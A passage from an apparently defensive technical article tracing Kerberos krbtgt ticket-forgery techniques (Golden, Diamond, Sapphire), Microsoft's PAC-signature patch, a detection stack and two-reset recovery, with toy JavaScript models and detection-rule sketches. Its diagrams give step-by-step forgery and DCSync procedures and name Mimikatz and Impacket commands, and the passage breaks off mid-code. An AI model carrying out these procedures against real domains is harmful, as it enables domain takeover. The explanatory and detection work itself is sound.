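  return crypto.createHmac("sha256", key).update(text).digest("hex");
}

const krbtgtKey = "kdc-only-secret"; // placeholder, not real key material
const forgedPac = "user=alice;groups=Domain Admins";

// Pre-patch model: the verifier recomputes an unkeyed checksum, so the
// attacker's value matches without any knowledge of the krbtgt key.
const attackerChecksum = crc32(forgedPac);
const prePatchAccepts = crc32(forgedPac) === attackerChecksum;

// Post-patch model: the verifier recomputes the tag under the krbtgt key, so
// a tag computed under any other key does not match.
const attackerTag = keyedTag("attacker-guess", forgedPac);
const postPatchAccepts = keyedTag(krbtgtKey, forgedPac) === attackerTag;

console.log({ prePatchAccepts, postPatchAccepts });
```

The first comparison always succeeds because nothing secret enters the computation; the second succeeds only for a party that holds the key, which is the property the patch restored.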

Generation 2 (August 7, 2014): Golden Ticket

Skip Duckwall and Benjamin Delpy presented "Abusing Microsoft Kerberos: Sorry you guys don't get it" at Black Hat USA on August 7, 2014 [@infocondb-bh2014]. The technique they demonstrated is what Sean Metcalf later popularised as the Golden Ticket: with the krbtgt key in hand, an attacker forges a TGT from scratch for any principal SID with any group memberships [@adsec-1640]. The KDC validates the TGT by decrypting enc-part with the krbtgt key. There is no upstream authority to check, because krbtgt is the authority. MITRE T1558.001 codifies the technique [@mitre-t1558001]; Benjamin Delpy's Mimikatz kerberos::golden command operationalises it [@mimikatz].

sequenceDiagram
    participant A as Attacker (holds krbtgt key)
    participant L as Local Kerberos cache
    participant K as KDC on a DC
    participant S as Target service
    A->>A: Choose target SID and groups
    A->>A: Build EncTicketPart locally
    A->>A: HMAC PAC signatures under krbtgt key
    A->>A: AES-encrypt enc-part under krbtgt key
    A->>L: kerberos::ptt -- inject ticket
    L->>K: TGS-REQ presenting forged TGT
    K->>K: Decrypt TGT with krbtgt key -- valid
    K->>L: TGS-REP for target service
    L->>S: Present service ticket -- access granted

The Golden Ticket works because of the single-key trust property the 1988 design chose. There is nothing in the protocol that asks "is this TGT in the KDC's issuance log?" The TGT is self-verifying. If it decrypts and its signatures validate under the key, it is, by definition, a TGT.

Why, then, does Golden Ticket sometimes get caught? Because the default Mimikatz invocation leaves four observable artefacts that Microsoft Defender for Identity ships dedicated alerts for, under the umbrella of the Suspected-Golden-Ticket alert family [@mdi-classic][@mdi-credential]. Mimikatz historically defaulted to RC4-HMAC encryption (enctype 23), which is anomalous on a modern AD where AES is standard. Mimikatz historically defaulted to a ten-year ticket lifetime, against the AD MaxTicketAge default of ten hours. The attacker frequently asserts groups the user does not actually hold, which produces a "forged authorization data" anomaly. And the attacker sometimes forges a ticket for an account that does not exist in the directory at all, which produces a "nonexistent account" anomaly. Microsoft's live MDI alerts page enumerates six External IDs in the family: 2009 (encryption downgrade), 2013 (forged authorization data), 2022 (time anomaly), 2027 (nonexistent account), 2032 (ticket anomaly), and 2040 (ticket anomaly using RBCD) [@mdi-classic].
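
The four artefacts listed above lend themselves to a simple rule sketch. What follows is a hedged illustration, not Defender for Identity's detection logic: the ticket and directory shapes, the field names, and the `goldenTicketArtefacts` function are all hypothetical, and the finding labels merely echo the alert descriptions quoted above.

```javascript
// Hypothetical ticket-observation shape; field names are illustrative only.
const POLICY_MAX_TICKET_HOURS = 10; // the AD default ticket lifetime cited above
const RC4_HMAC = 23;

// Returns the list of Golden-Ticket-style artefacts a ticket exhibits.
function goldenTicketArtefacts(ticket, directory) {
  const findings = [];
  const account = directory[ticket.cname];
  if (ticket.enctype === RC4_HMAC) findings.push("encryption downgrade");
  if (ticket.lifetimeHours > POLICY_MAX_TICKET_HOURS) findings.push("time anomaly");
  if (!account) {
    findings.push("nonexistent account");
  } else if (ticket.groups.some((g) => !account.groups.includes(g))) {
    findings.push("forged authorization data");
  }
  return findings;
}

const directory = { alice: { groups: ["Domain Users"] } };

// A ticket shaped like the historical Mimikatz defaults: RC4, ten years.
const mimikatzDefault = {
  cname: "alice",
  enctype: 23,
  lifetimeHours: 87600,
  groups: ["Domain Users", "Domain Admins"],
};
// A ticket shaped like normal KDC output.
const kdcIssued = { cname: "alice", enctype: 18, lifetimeHours: 10, groups: ["Domain Users"] };
// A ticket for a principal that is not in the directory.
const ghost = { cname: "ghost", enctype: 18, lifetimeHours: 10, groups: [] };

console.log(goldenTicketArtefacts(mimikatzDefault, directory));
console.log(goldenTicketArtefacts(kdcIssued, directory));
console.log(goldenTicketArtefacts(ghost, directory));
```

Every rule in the sketch reads a property of the ticket. None of them reads whether the issuer was the real KDC, which is the limitation the following paragraphs turn on.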

The structural observation: every alert in this family detects symptoms of forging from scratch. None of them detects the primitive of holding the krbtgt key. That distinction is what makes Generation 4 (Diamond) and Generation 5 (Sapphire) interesting.

Generation 3 (parallel path): Silver Ticket

Silver Tickets forge a service ticket (TGS) under a captured service-account key. They sidestep the krbtgt key entirely; the KDC is never involved in the forgery, and the forgery validates only against the one service whose key was captured. MITRE T1558.002 catalogues the technique [@mitre-t1558002]. Mentioned here so the question stops being asked. Silver Tickets are a sibling technique that targets a different trust root (per-service account keys), not the krbtgt key.

Generation 4 (June 2022): Diamond Ticket

In June 2022, Andrew Schwartz at TrustedSec and Charlie Clark at Semperis co-published "A Diamond in the Ruff," documenting a refinement of Golden Ticket that defeats every PAC-content anomaly detection in one stroke [@trustedsec-diamond][@semperis-diamond]. The technique: instead of forging the TGT from scratch, the attacker requests a real TGT from the KDC, then decrypts its enc-part using the held krbtgt key, modifies the PAC contents, re-signs the PAC under the krbtgt key, re-encrypts the enc-part, and walks away with a ticket whose every wire property -- sname, cname, authtime skew matching the real KDC's clock, plausible endtime, AES-256 envelope -- looks like a legitimate KDC-issued artefact.

sequenceDiagram
    participant A as Attacker (low-priv user, holds krbtgt key)
    participant K as KDC on a DC
    participant L as Local Kerberos cache
    participant S as Target service
    A->>K: AS-REQ for low-priv user
    K->>A: Real TGT, encrypted under krbtgt key
    A->>A: Decrypt enc-part with held krbtgt key
    A->>A: Modify PAC SIDs to Domain Admins
    A->>A: Recompute PAC signatures under krbtgt key
    A->>A: Re-encrypt enc-part under krbtgt key
    A->>L: ptt -- inject modified TGT
    L->>K: TGS-REQ presenting Diamond TGT
    K->>K: Decrypt -- valid, signatures match
    K->>L: TGS-REP for target service
    L->>S: Access granted as Domain Admin

Every MDI Suspected-Golden-Ticket detection disappears, by construction. The encryption type is AES-256 because the KDC issued it that way. The lifetime matches the AD policy because the KDC set it that way. The cname matches a real account because the attacker requested the TGT as a real low-privilege account they own. The only thing the attacker changed is the group SIDs inside the PAC, and the PAC signatures revalidate because the attacker recomputed them under the same krbtgt key the KDC would have used.
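
The decrypt, modify, re-sign, re-encrypt sequence can be modelled in a few lines. This is a toy sketch only: `seal` and `open` tag an object with the key that "encrypted" it instead of performing any cryptography, `signPac` produces a label rather than an HMAC, and every function name here is hypothetical.

```javascript
// Toy envelope: "encryption" is modelled as an object tagged with the key that
// sealed it. This is NOT cryptography; it only models who can open what.
function seal(key, payload) {
  return { sealedWith: key, payload: JSON.stringify(payload) };
}
function open(key, envelope) {
  if (envelope.sealedWith !== key) throw new Error("wrong key");
  return JSON.parse(envelope.payload);
}
// Label standing in for the PAC signatures computed under a key.
function signPac(key, pac) {
  return `sig(${key}|${JSON.stringify(pac)})`;
}

const krbtgtKey = "krbtgt-aes256-placeholder";

// The KDC issues a real TGT to a low-privilege account.
function kdcIssueTgt(cname) {
  const pac = { groups: ["Domain Users"] };
  return seal(krbtgtKey, {
    cname,
    enctype: 18,
    lifetimeHours: 10,
    pac,
    pacSig: signPac(krbtgtKey, pac),
  });
}

// Diamond steps: decrypt, edit the PAC, re-sign, re-encrypt, all under the held key.
function diamond(tgt, heldKey) {
  const part = open(heldKey, tgt);
  part.pac = { groups: [...part.pac.groups, "Domain Admins"] };
  part.pacSig = signPac(heldKey, part.pac);
  return seal(heldKey, part);
}

// KDC-side check: the ticket opens under krbtgt and the PAC signature matches.
function kdcValidates(tgt) {
  try {
    const part = open(krbtgtKey, tgt);
    return part.pacSig === signPac(krbtgtKey, part.pac);
  } catch {
    return false;
  }
}

const real = kdcIssueTgt("lowpriv");
const forged = diamond(real, krbtgtKey);
const before = open(krbtgtKey, real);
const after = open(krbtgtKey, forged);

console.log(kdcValidates(forged)); // true
console.log(after.enctype === before.enctype && after.lifetimeHours === before.lifetimeHours); // true
console.log(after.pac.groups); // [ 'Domain Users', 'Domain Admins' ]
```

In the model, the only field that differs between the issued and the modified ticket is the group list, while the envelope properties a ticket-shape detector would inspect are inherited from the KDC.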

TrustedSec verbatim: Diamond "would almost certainly require access to the AES256 key" [@trustedsec-diamond]. The KDC issued the real TGT in AES-256, so the attacker needs the AES-256 key to decrypt and re-encrypt -- not just the RC4 NTLM hash that the classic Golden Ticket can use.

The Diamond Ticket disclosure pointed at an architectural problem: with the krbtgt key in hand, every PAC-content anomaly detection is defeated. Microsoft's structural answer was the Full PAC Signature in November 2022. We come to that in Generation 6.

Generation 5 (October 2022): Sapphire Ticket

Charlie Bromberg, who publishes under the handle Shutdown (@_nwodtuhs) at Synacktiv and maintains The Hacker Recipes wiki, disclosed Sapphire Ticket in October 2022 [@hackrecipes-sapphire][@shutdownrepo-sapphire]. Where Diamond modifies the PAC, Sapphire splices the PAC. The procedure abuses two Kerberos extensions in combination -- Service-for-User-to-Self (S4U2self) and User-to-User (U2U) -- to coerce the KDC into issuing a service ticket whose embedded PAC describes a target user the attacker wishes to impersonate. The attacker then extracts that genuine PAC from the service ticket and embeds it, unchanged, in a freshly constructed TGT signed under the held krbtgt key.

Service-for-User-to-Self (S4U2self): A Kerberos extension that lets a service request a ticket *to itself*, on behalf of another user, without that user presenting credentials. Originally designed for protocol-transition scenarios (a web service accepting forms-based auth and translating it to Kerberos for downstream calls). Defined in [MS-SFU] (Kerberos Protocol Extensions: Service for User and Constrained Delegation Protocol); referenced from [MS-KILE] [@mssfu].

User-to-User (U2U): A Kerberos extension defined in RFC 4120 §3.7 that allows a ticket to be encrypted under the recipient's session key rather than its long-term key, enabling two clients to authenticate to each other without either being a KDC-registered service [@rfc4120].

sequenceDiagram
    participant A as Attacker (low-priv user, holds krbtgt key)
    participant K as KDC on a DC
    participant L as Local Kerberos cache
    participant S as Target service
    A->>K: AS-REQ for low-priv user
    K->>A: Real attacker TGT
    A->>K: S4U2self + U2U TGS-REQ for target user
    K->>A: TGS containing target user's genuine PAC
    A->>A: Extract genuine PAC from TGS
    A->>A: Build new TGT, embed genuine PAC
    A->>A: Sign three PAC signatures under krbtgt key
    A->>A: Encrypt enc-part under krbtgt key
    A->>L: ptt -- inject Sapphire TGT
    L->>K: TGS-REQ presenting Sapphire TGT
    K->>K: Decrypt -- valid, PAC is genuine
    K->>L: TGS-REP for target service
    L->>S: Access granted as target user

By construction, there is no PAC-content anomaly to detect: the PAC inside the resulting TGT is literally a PAC the KDC issued for the target user, because the KDC did issue it. The PAC's three signatures revalidate because the attacker holds the krbtgt key to sign them; wherever the KDC validates the Full PAC Signature on incoming tickets, that signature also validates because the attacker computed it under the same krbtgt key. Detection must move to traffic-flow analysis -- specifically, the anomalous S4U2self plus U2U TGS-REQ sequence on the wire -- and as of May 2026 no vendor has shipped a clean canonical default-enabled analytic for that signal [@unit42-gemstones].

The Sapphire Ticket disclosure is widely misattributed to Charlie Clark (Semperis). The primary tooling artefact -- the Impacket PR #1411 conversation thread -- addresses the author as @ShutdownRepo, who is Charlie Bromberg of Synacktiv [@impacket-1411]. The Hacker Recipes wiki and pgj11.com both confirm Bromberg as the author of record [@hackrecipes-sapphire][@pgj11]. The misattribution conflates Sapphire with Clark's separate "AS Requested Service Tickets" technique.

The empirical artefact is the Impacket pull request #1411, in which Bromberg added the -impersonate flag to ticketer.py to put the tool into "sapphire ticket mode" [@impacket-1411][@shutdownrepo-sapphire]. Palo Alto Unit 42's "Precious Gemstones" survey is the vendor-side state-of-the-art summary [@unit42-gemstones].

Generation 6 (November 2022 to October 2023): KrbtgtFullPacSignature

Microsoft's formal response to the post-2014 attack arc shipped as KB5020805 starting November 8, 2022, addressing CVE-2022-37967 [@kb5020805][@cve-2022-37967]. The fix adds a new PAC signature -- the Full PAC Signature -- computed by the KDC over the entire PAC including the older two signatures, validated on incoming tickets, and rolled out across five deployment phases:

Phase	Date	Mode	`KrbtgtFullPacSignature` value
Initial Deployment	November 8, 2022	Signatures added, validation disabled	1 (Compatibility)
Second Deployment	December 13, 2022	Audit mode default	2 (Audit)
Third Deployment	June 13, 2023	Cannot disable signature addition	(value 0 removed)
Default Enforcement	July 11, 2023	Enforcement default	3 (Enforcement)
Removal of Compatibility	October 10, 2023	Audit removed, Enforcement permanent	(registry key removed)
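
The phase table above can be read as a date-indexed lookup. The sketch below simply transcribes the table into data; `PHASES` and `phaseOn` are hypothetical names, the mode strings repeat the table's wording, and the lookup assumes a domain controller that has installed every update released up to the queried date.

```javascript
// Phase table transcribed from the KB5020805 rollout described above.
// Each entry starts on its listed date and holds until the next one begins.
const PHASES = [
  { from: "2022-11-08", name: "Initial Deployment", mode: "Signatures added, validation disabled" },
  { from: "2022-12-13", name: "Second Deployment", mode: "Audit mode default" },
  { from: "2023-06-13", name: "Third Deployment", mode: "Cannot disable signature addition" },
  { from: "2023-07-11", name: "Default Enforcement", mode: "Enforcement default" },
  { from: "2023-10-10", name: "Removal of Compatibility", mode: "Audit removed, Enforcement permanent" },
];

// Returns the phase in effect on an ISO date (YYYY-MM-DD), or null before rollout.
function phaseOn(isoDate) {
  let active = null;
  for (const phase of PHASES) {
    if (isoDate >= phase.from) active = phase; // ISO dates compare correctly as strings
  }
  return active;
}

console.log(phaseOn("2022-10-01"));      // null
console.log(phaseOn("2023-01-15").name); // Second Deployment
console.log(phaseOn("2023-08-01").name); // Default Enforcement
console.log(phaseOn("2024-03-01").mode); // Audit removed, Enforcement permanent
```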

KB5020805 documents the final state verbatim: "Windows updates released on or after October 10, 2023 will do the following: Removes support for the registry subkey KrbtgtFullPacSignature. Removes support for Audit mode. All service tickets without the new PAC signatures will be denied authentication" [@kb5020805].

Note: The KB number for KrbtgtFullPacSignature is KB5020805, not KB5021131. KB5021131 is the paired but distinct KB for CVE-2022-37966 (encryption-type enforcement). The PAC-signature-specific KB is KB5020805. Secondary sources routinely confuse the two.

Here is the structural fact. The Full PAC Signature is also computed under the krbtgt key. So an attacker who holds the krbtgt key still mints fully-validating tickets, including:

Sapphire Tickets, which never modify the PAC at all; the existing signatures the KDC issued are valid by construction, the Full PAC Signature included.
Recomputed Diamond Tickets, in which the attacker simply computes the Full PAC Signature alongside the older KDC signature in the same step, because both depend on the same key the attacker holds.

KrbtgtFullPacSignature retired one specific class of attack (Diamond Tickets that did not recompute the Full PAC Signature). It did not retire the underlying primitive (TGT forgery from a known krbtgt key). The PAC signature surface in Section 3 -- all three signatures terminating at the same key -- is exactly why this is so.

Key idea: The Full PAC Signature was Microsoft's structural response to Diamond Ticket. It is itself computed under the krbtgt key. So an attacker who holds the krbtgt key recomputes it in the same step as the KDC signature -- and Sapphire Tickets, which never modify the PAC at all, are unaffected by construction. CVE-2022-37967 retired one class of attack (PAC-modifying Diamond variants); it did not retire the primitive.

Comparing the three forgery variants

Dimension	Golden	Diamond	Sapphire
Requires krbtgt key?	Yes	Yes (AES-256)	Yes (AES-256)
Calls the KDC?	No (forges from scratch)	Yes (real AS-REQ)	Yes (AS-REQ + S4U2self+U2U)
Modifies the PAC?	Builds it from scratch	Yes (group SIDs)	No (genuine PAC)
Defeats MDI encryption downgrade alert?	No (defaults RC4)	Yes (real AES)	Yes (real AES)
Defeats MDI time-anomaly alert?	No (defaults 10y)	Yes (KDC lifetime)	Yes (KDC lifetime)
Defeats MDI forged-auth-data alert?	No	Yes (still triggers if group mismatch detected via other means)	Yes (PAC is genuine)
Defeats Full PAC Signature (post-July 2023)?	Yes (recomputed under held key)	Yes (recomputed)	Yes (genuine PAC)
Known wire-residual?	Encryption type, lifetime, groups	Re-encryption-under-held-key timing	S4U2self+U2U conjunction

Six generations from MS14-068 to KrbtgtFullPacSignature, and the residual primitive is exactly what the 1988 paper described: hold the key, mint the ticket. So what does the detection topology in 2026 actually catch?

6. The Detection Stack in 2026

Detection of krbtgt-class attacks in 2026 is a four-layer stack. Each layer has a specific class of signal it reads, a specific class of attack it catches, and a specific gap that the next layer is supposed to close. Three of the four layers have a known gap above them. The fourth has nothing above it.

flowchart TD
    L4["Layer 4 -- S4U2self plus U2U residual (no vendor analytic shipped)"]
    L3["Layer 3 -- Network/SIEM (Sentinel, Splunk T1558.001)"]
    L2["Layer 2 -- Behavioural (MDI Suspected-Golden-Ticket family)"]
    L1["Layer 1 -- Posture (BloodHound DCSync edge)"]
    KEY["krbtgt long-term key (the attacker's objective)"]
    L1 --> L2
    L2 --> L3
    L3 --> L4
    L4 --> KEY

Layer 1: posture (BloodHound DCSync edge)

The posture layer asks a question with no per-event component: "Who has rights that could extract the krbtgt key, regardless of whether they have used those rights?" In Active Directory terms, the answer is "anyone holding DS-Replication-Get-Changes plus DS-Replication-Get-Changes-All rights against a writeable DC, plus anyone who holds privileges that allow them to grant those rights to themselves." BloodHound encodes the answer as a DCSync edge in its graph; the canonical community Cypher query is MATCH (u)-[:DCSync]->(d:Domain) RETURN u, d. The current shipping release of BloodHound Community Edition is v9.1.0, dated 2026-05-06 per the release notes [@bloodhound-notes].
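
The core of the posture question, "who holds both replication rights", can be sketched over a flat list of access-control entries. This is a deliberately reduced illustration and not BloodHound's data model: the `{ principal, right }` records and the `dcsyncCapable` function are hypothetical, and the sketch ignores group nesting and the indirect paths (for example, rights to rewrite the ACL) that a graph query would also follow.

```javascript
const REQUIRED_RIGHTS = [
  "DS-Replication-Get-Changes",
  "DS-Replication-Get-Changes-All",
];

// aces: hypothetical flattened ACEs on the domain object, one right per record.
// Returns the principals that hold every required replication right.
function dcsyncCapable(aces) {
  const byPrincipal = new Map();
  for (const { principal, right } of aces) {
    if (!byPrincipal.has(principal)) byPrincipal.set(principal, new Set());
    byPrincipal.get(principal).add(right);
  }
  return [...byPrincipal]
    .filter(([, rights]) => REQUIRED_RIGHTS.every((r) => rights.has(r)))
    .map(([principal]) => principal)
    .sort();
}

const aces = [
  { principal: "Domain Controllers", right: "DS-Replication-Get-Changes" },
  { principal: "Domain Controllers", right: "DS-Replication-Get-Changes-All" },
  { principal: "svc-backup", right: "DS-Replication-Get-Changes" },
  { principal: "svc-sync", right: "DS-Replication-Get-Changes" },
  { principal: "svc-sync", right: "DS-Replication-Get-Changes-All" },
];

console.log(dcsyncCapable(aces)); // [ 'Domain Controllers', 'svc-sync' ]
```

In this sample, `svc-backup` holds only one of the two rights and is therefore not reported, while `svc-sync` is the kind of non-DC principal the posture layer exists to surface.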

DCSync: A replication primitive Mimikatz first productionised in August 2015. The attacker invokes the `DRSGetNCChanges` API call against a writeable domain controller, masquerading as a peer DC, and the target DC obligingly streams back the requested account secrets including the krbtgt long-term key. MITRE T1003.006 catalogues the technique [@mitre-t1003006]. Sean Metcalf's adsecurity.org write-up notes "DCSync was written by Benjamin Delpy and Vincent Le Toux" [@adsec-1729].

What this layer detects: any principal whose existing AD permissions create a path to the krbtgt key. What this layer misses: any attacker who already has the key. Posture is preventive, not detective. By the time the attacker is invoking kerberos::golden, the posture layer has already missed its window.

Layer 2: behavioural (Microsoft Defender for Identity)

Microsoft Defender for Identity ships an alert family covering classic Golden-Ticket-from-Mimikatz behaviour. The live MDI classic alerts page enumerates six Suspected-Golden-Ticket External IDs: 2009 (encryption downgrade), 2013 (forged authorization data), 2022 (time anomaly), 2027 (nonexistent account), 2032 (ticket anomaly), and 2040 (ticket anomaly using RBCD) [@mdi-classic]. The Credential access section adds External ID 2006 for "Suspected DCSync attack" on the extraction side [@mdi-classic].

What this layer detects: the Mimikatz Golden Ticket defaults plus the DCSync extraction primitive that produces the krbtgt key in the first place. What this layer misses: Diamond and Sapphire by construction. Diamond removes the PAC-content anomalies because every artefact except the modified group SIDs comes from the real KDC. Sapphire defeats PAC-content anomaly detection entirely by using a PAC the KDC genuinely issued via S4U2self plus U2U.

The MDI credential-access alerts page is the entry point to the family in the modern Microsoft Defender XDR console layout [@mdi-credential].

Layer 3: network and SIEM (Sentinel, Splunk)

Multi-vendor SIEM content packs ship analytic rules covering Kerberos behaviours flagged under MITRE T1558.001. Splunk's research catalogue contains the canonical example: "Kerberos Service Ticket Request Using RC4 Encryption" detects TGS-REQ traffic with encryption-type 0x17 (RC4-HMAC), leveraging Windows Event 4769 from the DCs [@splunk-7d9]. Microsoft Sentinel ships parallel rules under the Microsoft Defender XDR content connector. The pattern these analytics share is reliance on encryption-type anomalies, group-membership anomalies, or lifetime anomalies that appear in Windows event logs after the fact.

What this layer detects: signature-style indicators of Golden Ticket behaviour on the wire and in the DC event log. What this layer misses: the same encryption-downgrade dependency MDI's alert 2009 has. The Splunk analytic verbatim acknowledges its own limit: "This detection may be bypassed if attackers use the AES key instead of the NTLM hash" [@splunk-7d9]. Diamond and Sapphire both use the AES-256 key. Both walk through this layer untouched.
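
The encryption-type dependency is easy to see in a reduced form of such a rule. The sketch below is not the Splunk analytic itself: the event records are hypothetical and heavily simplified, the field names are illustrative, and `rc4ServiceTicketRequests` is an assumed helper that keeps only Event 4769 records whose ticket encryption type is `0x17`.

```javascript
// Hypothetical, simplified event records. Real Event 4769 entries carry many
// more fields; only the ones this rule reads are modelled here.
const events = [
  { eventId: 4769, account: "alice", service: "cifs/fs01", ticketEncryptionType: "0x17" },
  { eventId: 4769, account: "bob", service: "http/web01", ticketEncryptionType: "0x12" },
  { eventId: 4768, account: "carol", service: "krbtgt", ticketEncryptionType: "0x17" },
];

// Keep service-ticket requests (4769) that used RC4-HMAC (0x17, enctype 23).
function rc4ServiceTicketRequests(records) {
  return records.filter(
    (e) => e.eventId === 4769 && e.ticketEncryptionType.toLowerCase() === "0x17"
  );
}

const hits = rc4ServiceTicketRequests(events);
console.log(hits.map((e) => e.account)); // [ 'alice' ]
```

The `bob` record uses `0x12` (AES-256, enctype 18) and passes through the filter untouched, which is the bypass the analytic's own documentation concedes.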

Note: Microsoft Sentinel ships rules called "Kerberoasting" that target MITRE T1558.003 (extracting service-account secrets by requesting SPN-bearing service tickets and brute-forcing the resulting RC4-encrypted blobs offline). Those rules target service accounts with SPNs registered against them. They are not a krbtgt detection asset. The krbtgt account does not have an SPN that any client can request a TGS for; the relevant Sentinel content for krbtgt-class attacks is the T1558.001 Golden-Ticket and Kerberos-anomaly analytic family.

Layer 4: the Sapphire residual

What would catch a Sapphire Ticket? The only wire-observable residual of the technique is the conjunction of (a) a TGS-REQ specifying the S4U2self flag, and (b) the same TGT being used to address a User-to-User request to the KDC. No other layer of the stack reads this signal because no other attack has historically produced it as a precondition.
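
As a thought experiment, the conjunction could be expressed as a correlation over observed TGS-REQs. This is a speculative sketch, not a shipped or vendor-endorsed analytic: the request records, the `tgtId` correlation key, the boolean `s4u2self` and `u2u` fields, and the `sapphireCandidates` function are all assumptions, and a real deployment would need to account for services that use S4U2self legitimately.

```javascript
// Hypothetical observations of TGS-REQs, keyed by the TGT that was presented.
// Flags a TGT when both S4U2self and U2U have been requested with it, whether
// in the same request or across separate requests.
function sapphireCandidates(requests) {
  const seen = new Map(); // tgtId -> { s4u2self, u2u }
  for (const req of requests) {
    const flags = seen.get(req.tgtId) || { s4u2self: false, u2u: false };
    flags.s4u2self = flags.s4u2self || req.s4u2self;
    flags.u2u = flags.u2u || req.u2u;
    seen.set(req.tgtId, flags);
  }
  return [...seen]
    .filter(([, flags]) => flags.s4u2self && flags.u2u)
    .map(([tgtId]) => tgtId);
}

const requests = [
  { tgtId: "tgt-1", client: "websvc", s4u2self: true, u2u: false },   // protocol transition only
  { tgtId: "tgt-2", client: "lowpriv", s4u2self: true, u2u: true },   // both in one request
  { tgtId: "tgt-3", client: "peer", s4u2self: false, u2u: true },     // U2U only
  { tgtId: "tgt-4", client: "lowpriv2", s4u2self: true, u2u: false }, // split across
  { tgtId: "tgt-4", client: "lowpriv2", s4u2self: false, u2u: true }, // two requests
];

console.log(sapphireCandidates(requests)); // [ 'tgt-2', 'tgt-4' ]
```

Either extension alone is ordinary traffic in this model; only their co-occurrence on one TGT is reported.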

What ships: nothing canonical. SpecterOps and the BloodHound content team have signalled graph-query work on the U2U TGS issuance pattern in 2026 trend reports [@bloodhound-notes], but have shipped no default-enabled analytic. Palo Alto Unit 42's "Precious Gemstones" survey describes Cortex XDR detection-attempt heuristics but does not publish the rule [@unit42-gemstones]. The gap is engineering, not theoretical: the signal exists, the analytic to read it has simply not been packaged, and closing it is the active research front for the 2026 to 2028 cycle.

Note: No vendor analytic shipped for the S4U2self plus U2U conjunction as of May 2026. Sapphire is the current frontier and the article's "what 2026 still cannot do" gap. An attacker who holds the krbtgt key and uses the Sapphire technique walks past every shipping detection layer.

Defensive method matrix

Method	Catches Golden?	Catches Diamond?	Catches Sapphire?	Layer
BloodHound DCSync edge	preventive only	preventive only	preventive only	1
MDI Suspected-Golden-Ticket (6 External IDs)	yes	no	no	2
MDI Suspected DCSync (ID 2006)	extraction step only	extraction step only	extraction step only	2
Sentinel / Splunk T1558.001 RC4 rule	yes (if RC4)	no	no	3
Sentinel Kerberos-anomaly content pack	partial (lifetime/groups)	no	no	3
Full PAC Signature (post-July 2023)	n/a (already signed correctly)	retires non-recomputing variants	no	n/a (cryptographic enforcement, not detection)
S4U2self+U2U conjunction analytic	n/a	n/a	would catch	4 (not shipped)

Adjacent T1558 family techniques that are not krbtgt detections

Technique	What it targets	krbtgt detection?
T1558.002 Silver Ticket	service-account long-term keys	no
T1558.003 Kerberoasting	SPN-bearing service accounts via offline RC4 crack	no
T1558.004 AS-REP Roasting	accounts with pre-auth disabled	no
OverPass-the-Hash	user NTLM hashes via Kerberos PA-DATA	no

Detection in 2026 is a four-layer stack, and three of the layers leave gaps the next layer is supposed to close. The fourth gap -- the Sapphire residual -- has no layer above it. When the gaps close enough to confirm a krbtgt compromise, what does recovery actually look like?

7. Recovery: What the Two-Reset Procedure Actually Does

The Microsoft AD Forest Recovery page states the procedure verbatim:

"You should perform this operation twice. You must wait 10 hours between password resets. 10 hours are the default Maximum lifetime for user ticket and Maximum lifetime for service ticket policy settings, hence in a case where the Maximum lifetime period changes, the minimum waiting period between resets should be greater than the configured value." -- and -- "The password history value for the krbtgt account is 2, meaning it includes the two most recent passwords. By resetting the password twice you effectively clear any old passwords from the history, so there's no way another DC replicates with this DC by using an old password." [@ms-forest-recovery]

What exactly do those two resets buy, and what do they not buy?

The mechanics of two-slot eviction

The krbtgt account, like every other AD account, stores both current and previous keys. A TGT issued at time $T = 0$ under key $K_0$ continues to validate after a rotation at $T = T_1$ (when $K_1$ becomes current and $K_0$ moves to the previous slot), because the KDC tries both keys during the in-flight validation window. One rotation fills the previous slot with the now-replaced $K_0$; the second rotation, separated by at least MaxTicketAge so that all $K_0$-signed TGTs have expired naturally, fills the previous slot with $K_1$ and evicts $K_0$ entirely. After the second rotation completes and replicates, no key in the krbtgt account matches the attacker's extracted $K_0$; forged TGTs from that key fail validation cleanly [@ms-forest-recovery].

MaxTicketAge: The Kerberos policy value that bounds the lifetime of a Ticket-Granting Ticket from the moment of issuance. The Active Directory default is 10 hours, configured via the Default Domain Policy. The AD Forest Recovery procedure waits at least `MaxTicketAge` between krbtgt resets to ensure no in-flight TGT outlives the period between the two rotations [@ms-forest-recovery].

flowchart LR
  A0["T=0: K_0 current, K_prior previous"] --> A1["T=T_1: reset 1 -- K_1 current, K_0 previous"]
  A1 --> A2["T_1 + 10h: K_1 still current, K_0 still previous"]
  A2 --> A3["T=T_2 (≥ T_1 + 10h): reset 2 -- K_2 current, K_1 previous"]
  A3 --> A4["After replication: K_0 evicted from both slots"]

The 10-hour wait between resets is not a Microsoft convenience choice; it is a cryptographic requirement. If the second reset lands before all $K_0$-signed TGTs have expired naturally, some of those tickets will hit a DC whose previous slot now holds $K_1$ rather than $K_0$, and the KDC will reject them. This is what KB5020805's PAC-signature deployment phases also had to navigate during the November 2022 to October 2023 rollout: signature additions and validation transitions had to bracket the maximum in-flight ticket lifetime [@kb5020805].

{`
// Model the krbtgt account as a two-slot store; simulate the two-reset procedure.
function simulate(events) {
  const slots = { current: "K_prior", previous: null };
  let stolen = null;
  for (const ev of events) {
    if (ev.kind === "compromise") {
      stolen = slots.current; // attacker extracts whichever key is current
    } else if (ev.kind === "reset") {
      slots.previous = slots.current; // the old current key moves to the previous slot
      slots.current = ev.newKey;
    }
    // The KDC accepts a ticket signed under either slot.
    const validates = stolen !== null &&
      (stolen === slots.current || stolen === slots.previous);
    console.log(
      "[t=" + ev.t.toString().padStart(3) + "h]",
      ev.kind.padEnd(11),
      "current=" + slots.current,
      "prev=" + (slots.previous ?? "-"),
      "attacker_validates=" + validates
    );
  }
}

simulate([
  { t: 0, kind: "issue" },
  { t: 1, kind: "compromise" }, // attacker stores K_prior as stolen
  { t: 3, kind: "reset", newKey: "K_1" },
  { t: 13, kind: "reset", newKey: "K_2" }, // ≥ MaxTicketAge later
  { t: 14, kind: "issue" },
]);
`}
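The cost of shortening the wait can be put in numbers. The sketch below is illustrative only: `strandedIssueWindow` is a hypothetical helper, times are hours on an arbitrary clock, and it assumes every TGT lives for exactly `maxTicketAgeHours` with no renewal and no clock skew.

```javascript
// Hypothetical helper: which legitimately issued K_0 tickets are still unexpired
// at the moment the second reset evicts K_0 from the previous slot?
// Assumption: every TGT lives exactly maxTicketAgeHours; renewal and skew are ignored.
function strandedIssueWindow(firstResetAt, secondResetAt, maxTicketAgeHours = 10) {
  if (secondResetAt <= firstResetAt) {
    throw new RangeError("second reset must come after the first");
  }
  // K_0 stops signing new TGTs at the first reset, so the last K_0-signed
  // ticket expires at firstResetAt + maxTicketAgeHours.
  const lastExpiry = firstResetAt + maxTicketAgeHours;
  if (secondResetAt >= lastExpiry) {
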